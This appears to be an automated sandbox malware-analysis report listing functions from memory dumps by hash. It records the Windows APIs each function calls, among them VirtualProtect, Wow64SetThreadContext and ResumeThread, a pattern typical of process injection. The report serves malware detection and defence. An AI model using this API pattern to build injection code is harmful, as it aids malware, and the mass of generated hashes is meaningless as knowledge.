Opcode ID: 4ca505997bec3c5cb3a7d4e05c0a2b2474ce37006095074d7e77e0c7ae199a14
Instruction ID: f58a5b1570a192241586bd9c6a25350da5970ac597a4106b50be7641f0df5d6b
Opcode Fuzzy Hash: 4ca505997bec3c5cb3a7d4e05c0a2b2474ce37006095074d7e77e0c7ae199a14
Instruction Fuzzy Hash: 113163B9D042589FCF10CFA9E884A9EFBB5BB09310F20A42AE914B7310D335A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00377ED8, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00377F7F

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0a4f8606dbfa174799451bdd2922a024db495edba0889c1d26f52254de5e7fe0
Instruction ID: 3b06b4fb12bd949af0c89c894ff4b5a985cbb2c7f79ad6de578f657c1e7ed203
Opcode Fuzzy Hash: 0a4f8606dbfa174799451bdd2922a024db495edba0889c1d26f52254de5e7fe0
Instruction Fuzzy Hash: 50319AB5D042589FCF10CFA9D484ADEFBB4BB19310F24942AE814B7310D374A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 045F35A3, Relevance: 1.6, APIs: 1, Instructions: 92threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 045F365A

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8eed442d6c5a3306dd10a426dd003a4497c5725610902a3e45b51565b4bc6acc
Instruction ID: d172b2c963e38cbd836c49ce429bebe026c3971a72227335bc36127d71713de4
Opcode Fuzzy Hash: 8eed442d6c5a3306dd10a426dd003a4497c5725610902a3e45b51565b4bc6acc
Instruction Fuzzy Hash: 7431A9B4D012589FDB10CFA9E884ADEFBF1BB49314F24846AE414B7350D378AA45CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 045F35A8, Relevance: 1.6, APIs: 1, Instructions: 90threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 045F365A

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7fe99f20ef1aa56b962083301c266db787abfe3f9f9d9cee9d51e1554ac83e9e
Instruction ID: bb2870dd2268eb4410c8ab9b02c167915d0fef28c293457ed18edca820a83af9
Opcode Fuzzy Hash: 7fe99f20ef1aa56b962083301c266db787abfe3f9f9d9cee9d51e1554ac83e9e
Instruction Fuzzy Hash: 4E31ABB4D012589FDB10CFA9E884ADEFBF1BB49314F24846AE414B7310D378AA45CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 045F3A30, Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 045F3AB6

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b69bb72f8c064d87f8cd68a121232a23b3251d4431beb67495998f81b6e8e7b0
Instruction ID: 6a276cbefe1380a44405cfe589c65d4918c1655f4cec79b56c12f9adc3362a81
Opcode Fuzzy Hash: b69bb72f8c064d87f8cd68a121232a23b3251d4431beb67495998f81b6e8e7b0
Instruction Fuzzy Hash: E431AAB4D002189FDB10CFAAE884ADEFBF4BB49320F24945AE814B7350D335A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 045F3A38, Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 045F3AB6

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 47248c0048c3adc3b0a55636c984d71feca7240328d6017e9e5686a3dcd15cc2
Instruction ID: cfd8adf920a60232f9b530f591edb3d364e73ac2072539f3cb591a9201ca9e08
Opcode Fuzzy Hash: 47248c0048c3adc3b0a55636c984d71feca7240328d6017e9e5686a3dcd15cc2
Instruction Fuzzy Hash: 0C2179B4D002189FDB10CFA9E884ADEFBF4BB49314F24945AE914B7310D335A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 006E4278, Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

@7, xrefs: 006E443B

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID: @7
API String ID: 0-924398317
Opcode ID: 5cda0bbce4f82c53e2650d8e4d3f1ce4faae5fbc8b0d3b8ef486bb92fd4b1d43
Instruction ID: e5012d233e9119efa688a1236be953989833509dcb6f25808ecea26caeaebd70
Opcode Fuzzy Hash: 5cda0bbce4f82c53e2650d8e4d3f1ce4faae5fbc8b0d3b8ef486bb92fd4b1d43
Instruction Fuzzy Hash: E0415E3490A3C88FCB02DBB4D8645DD7FB1BF8A204B0985DBC485DF6A3DA385905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 006E76E2, Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

P, xrefs: 006E7745

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID: P
API String ID: 0-935723149
Opcode ID: 2e71460c97900c1e17f74adb456c254beaffc77c5c50269f81ea9dd8f51fd226
Instruction ID: 116814b0d8ea4296045afc3d2ef3e8db1bea3536e483c8a1f26c5345517f805e
Opcode Fuzzy Hash: 2e71460c97900c1e17f74adb456c254beaffc77c5c50269f81ea9dd8f51fd226
Instruction Fuzzy Hash: 52810978A09298CFCB54CFA9D8808EDBBB6FB49310B245569E819AB352D734D942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006E76FD, Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

P, xrefs: 006E7745

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID: P
API String ID: 0-935723149
Opcode ID: c50decc782cf78bf8398688a4fe4fac1ac8452c98e49852e6c6b740fdfab6fce
Instruction ID: 3196c87d58a2260ebede1aa68454b2c77047ddce5b751f7252a563e80f0b4c15
Opcode Fuzzy Hash: c50decc782cf78bf8398688a4fe4fac1ac8452c98e49852e6c6b740fdfab6fce
Instruction Fuzzy Hash: DD71E678A09258CFCF54CFA9D8808EDB7B6FB49310B249569E819AB352D734D942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006E8D00, Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

ZbA, xrefs: 006E8E22

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID: ZbA
API String ID: 0-2831055772
Opcode ID: ac8244afb917e8b3de48a81bb8c9d69f8f87e584d14f40acdf963064901fd1a8
Instruction ID: 449adb9f710e2d58684929df76d65a7516494aab2ddd9125c1cbea7724d2ba94
Opcode Fuzzy Hash: ac8244afb917e8b3de48a81bb8c9d69f8f87e584d14f40acdf963064901fd1a8
Instruction Fuzzy Hash: 58513874E05259DFCB48DFA9C8809EEBBB2FF89300F618529E405AB364DB359942CF51

Uniqueness

Uniqueness Score: -1.00%

Function 006E0A69, Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

PSIl, xrefs: 006E0B13

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID: PSIl
API String ID: 0-3775699304
Opcode ID: 9a8027dfae008aca2c91e85a547603874e5f87c84f8e4f4036be5e64d3374445
Instruction ID: c5b63668f7308a49275380bb5fb196c3875737a7a1ba7fdd39766984e7d4401c
Opcode Fuzzy Hash: 9a8027dfae008aca2c91e85a547603874e5f87c84f8e4f4036be5e64d3374445
Instruction Fuzzy Hash: E4412334702345CFE714DB69DC5176ABBA7AB89300F24867AE8468B391CBB48881CB52

Uniqueness

Uniqueness Score: -1.00%

Function 006E3114, Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

`!Nm, xrefs: 006E31DA

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID: `!Nm
API String ID: 0-2115271590
Opcode ID: 42406e237c8719aa9d79f0965e6bd4e0074e8cc75c422ba4b84c9dd07d5f51d5
Instruction ID: 7f82a7e7c5b795c4f2e4bb672a8662b2679ac9734587bdda9cbd77a6a9188222
Opcode Fuzzy Hash: 42406e237c8719aa9d79f0965e6bd4e0074e8cc75c422ba4b84c9dd07d5f51d5
Instruction Fuzzy Hash: D9312630A0A7F4CBC711862AC8593F97BE3AB41750F28826AD162CB395DB75CF429706

Uniqueness

Uniqueness Score: -1.00%

Function 00379C18, Relevance: 1.3, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0037A96E

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 72bbf5c55d4423fbd1fe00add17897b72bfb465f23a0be1bae684961618e2e1a
Instruction ID: 9e9b53fe169311a2afad1374edbd11d0bfc40dbffa7affa130fa73071d4ec9ca
Opcode Fuzzy Hash: 72bbf5c55d4423fbd1fe00add17897b72bfb465f23a0be1bae684961618e2e1a
Instruction Fuzzy Hash: E931BFB4D04218DFCB10CFA9D484AEEFBF4AB49310F24946AE954B7310D378A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 006E4400, Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

@7, xrefs: 006E443B

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID: @7
API String ID: 0-924398317
Opcode ID: 0d6ac2b62162661f8931b62d710c8c1f03570c0062b8607da2e1fa5a2cabb2e3
Instruction ID: fcbfd8153c207a8b95bbe984c00e3fd0daa03de7cce9404cd0dfe55b42366042
Opcode Fuzzy Hash: 0d6ac2b62162661f8931b62d710c8c1f03570c0062b8607da2e1fa5a2cabb2e3
Instruction Fuzzy Hash: 89213978E012099FCB44DFA9D884AEDB7F2FF88304F108969D505AB755DB386A42CF91

Uniqueness

Uniqueness Score: -1.00%

Function 006E34B4, Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

Y, xrefs: 006E34B8

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID: Y
API String ID: 0-3233089245
Opcode ID: 28a8741218fe60e560efa63e31e7c7a6144a6218bbf4ed9fc7fab29e4ddd1cd7
Instruction ID: 3db6167373b0dd6fa63e4c7a9bdbbef6ba3d7f72a77abc114d8171bcef512229
Opcode Fuzzy Hash: 28a8741218fe60e560efa63e31e7c7a6144a6218bbf4ed9fc7fab29e4ddd1cd7
Instruction Fuzzy Hash: C3E0B6B4D0A25ACFEB45CFA5D4586ADBBB5FB09300F11402BD81AE7351D6344A02CF51

Uniqueness

Uniqueness Score: -1.00%

Function 006E370C, Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9329178079b42b1957caabfda6303e8b907ae6d55212a9d48596418d253fddf
Instruction ID: b678a8b9ef3a2df891909c5c9830d02295d5c4eb8288f251edd0d020e3d96844
Opcode Fuzzy Hash: a9329178079b42b1957caabfda6303e8b907ae6d55212a9d48596418d253fddf
Instruction Fuzzy Hash: 84E14E7090626ACFDB60DF68D948AECB7F6FB05324F2096A5D41A973D1DB304A81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 006E61FD, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd55fe13624e7e7a59fe700d0912263f4c1aaf83e924f388e06bffcd471bdcc4
Instruction ID: 0128b8f6649997e14c83c3fd429557cea2302b91d9de61f241bf9976c9f004c8
Opcode Fuzzy Hash: cd55fe13624e7e7a59fe700d0912263f4c1aaf83e924f388e06bffcd471bdcc4
Instruction Fuzzy Hash: 8DD18C70902288CFDB20DF99D588AEDBBF6FF15398F649294E4019B256C734E885CF58

Uniqueness

Uniqueness Score: -1.00%

Function 006E6143, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88a6c0c452975ac25739aab3cacebb4a09012a732427c1cc704ee699eda45f89
Instruction ID: eb4c9a7671fb414b061139c9183b19801ad2888ea3f98be1cfd04d1eea9a92fa
Opcode Fuzzy Hash: 88a6c0c452975ac25739aab3cacebb4a09012a732427c1cc704ee699eda45f89
Instruction Fuzzy Hash: 5DC19B70902288CFDB20DF99D584AEDBBF6FF24398F649694E4019B256C730E885CF58

Uniqueness

Uniqueness Score: -1.00%

Function 006E6198, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edc56b47e770e411eb5a1dd048c9a959ab65f3f7070255bc5439ac58e0b566e8
Instruction ID: 00da287757e075cca7f991101ba10cf1bcc9e56ef70d0b7304b45079353556e6
Opcode Fuzzy Hash: edc56b47e770e411eb5a1dd048c9a959ab65f3f7070255bc5439ac58e0b566e8
Instruction Fuzzy Hash: 9EC18970902288CFD720DF99D584AEDBBF6FF24398F649694E4019B256C734E885CF68

Uniqueness

Uniqueness Score: -1.00%

Function 006E61A8, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93b1932ae5fa8c0b5e18484f7a0d948d6f4717e1c5e4d7fb29fecb8ddd79c823
Instruction ID: cc33c4f8dcb7569a4fbeeb924b67b68c385d03c13a907056656cfab9faf6f45f
Opcode Fuzzy Hash: 93b1932ae5fa8c0b5e18484f7a0d948d6f4717e1c5e4d7fb29fecb8ddd79c823
Instruction Fuzzy Hash: 64C18870902288CFD720DF99D584AEDBBF6FB24398F649694E4019B256C730E885CF68

Uniqueness

Uniqueness Score: -1.00%

Function 006E61C7, Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6de46a83485555719bf49cf92d290ce5876f0622662ac3e5b75be012f9a7693c
Instruction ID: 62b846295a62a0fc2e6b4299df3dabebc74d3afc5d1bbf7e846676e5fb68745a
Opcode Fuzzy Hash: 6de46a83485555719bf49cf92d290ce5876f0622662ac3e5b75be012f9a7693c
Instruction Fuzzy Hash: 29C17A70902288CFDB20DF99D584AEDBBF6FF14398F649694E4019B256C734E885CF68

Uniqueness

Uniqueness Score: -1.00%

Function 006E733B, Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6a016eaabb643e0fbe1db5d7c4ec2b1df1ae49e751c40157d1562adc93755a5
Instruction ID: 2d6daefb8764bcd3cbdf3cb82a559751f9410eb9299f8fdfc48d5a5b75c2b49c
Opcode Fuzzy Hash: d6a016eaabb643e0fbe1db5d7c4ec2b1df1ae49e751c40157d1562adc93755a5
Instruction Fuzzy Hash: 7491C174D0A249CFDB10CFA9D580AEDBBF6FB49300F249519E809BB245D770AA86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006E2E10, Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee27b12fa25863a76536f29cbdb2313b5f72eb0fc1413dc698f3c3e9fe0b8acc
Instruction ID: 699e4266efff701c234c73c08e38fb3de22c160132c7778280b1bf2bd91100e8
Opcode Fuzzy Hash: ee27b12fa25863a76536f29cbdb2313b5f72eb0fc1413dc698f3c3e9fe0b8acc
Instruction Fuzzy Hash: 8171073090A3968FCB10CF79C9946AEBBB7BF05300F1485ABE556D7392C7349A06DB52

Uniqueness

Uniqueness Score: -1.00%

Function 006E57D9, Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0b1ef398e38583a73312459b7dbe546a2767e632d9b6858fe2c27e270395bef
Instruction ID: 71fded7fa9fc6497d20d72759b1c67dba607f04840d231d2748c12fab39d6374
Opcode Fuzzy Hash: d0b1ef398e38583a73312459b7dbe546a2767e632d9b6858fe2c27e270395bef
Instruction Fuzzy Hash: 80514770D0A798DFDB04CFAAD4447EEBBF6BB49318F24902AD416A7292C3744986CF51

Uniqueness

Uniqueness Score: -1.00%

Function 006E70BF, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 288688bb2efa90999793f4a84eeeef55ad9af8d6cc7d7ccfd08fcce488d4d068
Instruction ID: 24b9cb933b8bccdb7a64adf0e08daaef45ed2295c6b866169b8a51bfef6b7505
Opcode Fuzzy Hash: 288688bb2efa90999793f4a84eeeef55ad9af8d6cc7d7ccfd08fcce488d4d068
Instruction Fuzzy Hash: DC5127B0D0A399DBCB00CF9AD8809EDF7BAFF49300F259555D419B7201D730AA46CB64

Uniqueness

Uniqueness Score: -1.00%

Function 006E3248, Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b9d95422ea14cf175e1f219b981a5dca1140302bf8c96d7f962d78cbf5a8333
Instruction ID: 7d9281025484e5ba819def8c0936a4771d572c6b2c70de1dffb0cb3ec2693d99
Opcode Fuzzy Hash: 2b9d95422ea14cf175e1f219b981a5dca1140302bf8c96d7f962d78cbf5a8333
Instruction Fuzzy Hash: C941D0309092F58ECB05DB6989489BDBBB2BF15300F1486A6D065DB3A2DB389A00CB65

Uniqueness

Uniqueness Score: -1.00%

Function 006E21A0, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be2b25b43ea41b85250264ab55bf73053e1ceca3579fd57dc89d83a150f99f43
Instruction ID: ed547957799c3627b310b7ab9e80e73edca626c574b114b1fda946daaf2a474d
Opcode Fuzzy Hash: be2b25b43ea41b85250264ab55bf73053e1ceca3579fd57dc89d83a150f99f43
Instruction Fuzzy Hash: BD412732906786CBD714DB3ADC607EEB7ABAF41301F248926E22297291C7389A41CB45

Uniqueness

Uniqueness Score: -1.00%

Function 006E2E0E, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 882ca6dfa8a4bc8bdaa34d51cf098f35d97c84401182aaefa84b01a0e94efa4b
Instruction ID: 4b2294db8216cf496a639fc09ee2f887e4a9acde1cc2c62915a5999bc4997baf
Opcode Fuzzy Hash: 882ca6dfa8a4bc8bdaa34d51cf098f35d97c84401182aaefa84b01a0e94efa4b
Instruction Fuzzy Hash: 4731CC70902666CFCB20CF69C9946AEBBB7FF08301F20862AE017E7264D33489528B51

Uniqueness

Uniqueness Score: -1.00%

Function 000DD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194359253.00000000000DD000.00000040.00000001.sdmp, Offset: 000DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbbecf5e1cb4517125906ce0f51673b31aa6660b105ae7228f38636d84108f33
Instruction ID: aa69ca73c492d5228291432f3cd316165a130d80b1c3727515339a528143090b
Opcode Fuzzy Hash: dbbecf5e1cb4517125906ce0f51673b31aa6660b105ae7228f38636d84108f33
Instruction Fuzzy Hash: B321C175604344DFCB24DF64D884B16BFA5EB84314F24C96BD8094B346C336D847CA61

Uniqueness

Uniqueness Score: -1.00%

Function 000DD1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194359253.00000000000DD000.00000040.00000001.sdmp, Offset: 000DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f77cbaa9c62533bd35cd34a360a910245b78073774b8c24954159811c41097fe
Instruction ID: 3b386e4beb41eca90805c9aefb5c8ec8383bef7b73ed3b674273c61f1588df6c
Opcode Fuzzy Hash: f77cbaa9c62533bd35cd34a360a910245b78073774b8c24954159811c41097fe
Instruction Fuzzy Hash: 2121D075604304EFDB55CF60D9C0B2ABBA5FB94318F20C9ABE8094B346C336E846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 000DD006, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194359253.00000000000DD000.00000040.00000001.sdmp, Offset: 000DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e477609f046ce59d1dfc0c082cc1416613de9617baa1157ffad4871b97b9f912
Instruction ID: 924c98067dffdbbb6c0277799e0e6caae7cd4a1676dfde0a7ae97507df7c52b0
Opcode Fuzzy Hash: e477609f046ce59d1dfc0c082cc1416613de9617baa1157ffad4871b97b9f912
Instruction Fuzzy Hash: A1216F755093808FCB16CF24D994715BFB1EB86314F28C5EBD8498B697C33AD80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 006E5660, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d830297fa38a0f5c701e8ba9eb151d5a0b4e26e918639fe9f979bb87fff5557f
Instruction ID: ef7e65a127fa003231994c20751c5e8f70885c2983e38d30a479eaca1b014e76
Opcode Fuzzy Hash: d830297fa38a0f5c701e8ba9eb151d5a0b4e26e918639fe9f979bb87fff5557f
Instruction Fuzzy Hash: B4216D74D0524ADFCB40DFA8C880AEEBBB1FF49314F204AA9D519A73A1D7305A81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 006E064F, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f60c97c86af6acc804aca110f7a4652b340a63cf3cf768757cc86e4bed577029
Instruction ID: bbe2e71fa680443190a22edf0bc7cff82902fcbfff8a2746ad541c17ca7225ca
Opcode Fuzzy Hash: f60c97c86af6acc804aca110f7a4652b340a63cf3cf768757cc86e4bed577029
Instruction Fuzzy Hash: 2D11B63044E7C49FCB138B708D655897F70AF02314B0885CBD8E58B3A3DB38664AD751

Uniqueness

Uniqueness Score: -1.00%

Function 000DD1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194359253.00000000000DD000.00000040.00000001.sdmp, Offset: 000DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b949fe11458003d6ae66b652f7c4801d5528cc73102fbf4d81fcbabf05c0f7e9
Instruction ID: 1a372a66c2af872e317eee90ec1d0f43abc4e05a1c26f3aafb303f2359a3c193
Opcode Fuzzy Hash: b949fe11458003d6ae66b652f7c4801d5528cc73102fbf4d81fcbabf05c0f7e9
Instruction Fuzzy Hash: 75118B75544380DFCB56CF10D5C4B25BBA1FB94314F24C6AED8494B756C33AD84ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 000CD1D5, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194343483.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff10bd67fe22b7706c92db91abe2051c8b600b8d9f60dd4c0c9d5e3db395e5b
Instruction ID: 2aa5dd4136f7f9a59c15a7a013ee907000b4e08e75a4546e089837ed84e4a166
Opcode Fuzzy Hash: 5ff10bd67fe22b7706c92db91abe2051c8b600b8d9f60dd4c0c9d5e3db395e5b
Instruction Fuzzy Hash: F90184314043549AE7609B55C884FAFBBDCEF61324F18C96FED451A292C378E841CA71

Uniqueness

Uniqueness Score: -1.00%

Function 006E6F48, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b105053a2edc8b9581aa49aa6c424d8ec666ee28cd0b498383f15c431423132
Instruction ID: d84ba3d4513e194521418705e13f4dda43524aab083dd9f718fd8c58067bf5af
Opcode Fuzzy Hash: 9b105053a2edc8b9581aa49aa6c424d8ec666ee28cd0b498383f15c431423132
Instruction Fuzzy Hash: 9401C574D0120E9FCB84DFA8D884A9DF7B1FB88301F108AAA9419A7351DB706A41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 000CD1D4, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194343483.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 333bbc91501b8aa84fd20623755d36089c212e951effaca769c135126887ed6d
Instruction ID: 900101e1e0432cbc69ec143cf21081c3fb8a93044877e03c733e271cacb59c50
Opcode Fuzzy Hash: 333bbc91501b8aa84fd20623755d36089c212e951effaca769c135126887ed6d
Instruction Fuzzy Hash: 80F0AF714042409AE7608A15C888B66FFD8EB91324F28C56BED481A292C378A840CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 006E5720, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fee9f8627a931e47975b5eca7dd53ac6aa10fcb1d9de5f4b47a4121be933502
Instruction ID: 075e261fc86349ed19a24e78d8414cd01c38ea3f7b7ef286043dacd5b299668e
Opcode Fuzzy Hash: 1fee9f8627a931e47975b5eca7dd53ac6aa10fcb1d9de5f4b47a4121be933502
Instruction Fuzzy Hash: 9A01E474E0621D9FDB44DFE8C840ADEBBF1EB49304F1086AAD818A7356E7749A05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 006E5730, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ae4d007c9f149b6bee44012094e37594e22d88fc15aafb420156c10ee3cddb
Instruction ID: 2f1edc8c0ab552f337aceed9af6059a81167886530fd1d6851afeda64615b35e
Opcode Fuzzy Hash: f4ae4d007c9f149b6bee44012094e37594e22d88fc15aafb420156c10ee3cddb
Instruction Fuzzy Hash: 72F06274E0121DEFDB44EFE8D941A9EBBB5EB48304F1086AA9818A7315D7709A41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 006E06A8, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd5b2ed105b5825fa8965d4aad1ec497105cb33172efd27d0d758b39f976a433
